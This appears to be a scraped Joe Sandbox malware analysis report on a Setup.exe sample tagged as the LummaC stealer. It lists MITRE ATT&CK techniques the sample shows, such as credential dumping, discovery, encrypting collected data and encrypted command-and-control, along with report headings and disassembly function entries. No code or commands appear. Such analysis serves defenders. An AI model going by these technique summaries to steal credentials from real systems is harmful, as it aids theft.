Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
Setup.exe

Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Function 00430A20 Relevance: 19.1, APIs: 3, Strings: 7, Instructions: 1579
librarymemoryloaderCOMMON

Function 0043114C Relevance: 16.9, APIs: 2, Strings: 7, Instructions: 1127
librarymemoryloaderCOMMON

Function 02FA0AC1 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 00431EBC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243
memoryCOMMON

Function 02FA0971 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 02FA03B1 Relevance: 3.4, APIs: 2, Instructions: 399
threadCOMMON

Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 26
libraryloaderCOMMON

Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Function 004307B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
windowCOMMON

Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
threadCOMMON

Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Function 00497270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118
COMMON

Function 02FEEBEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre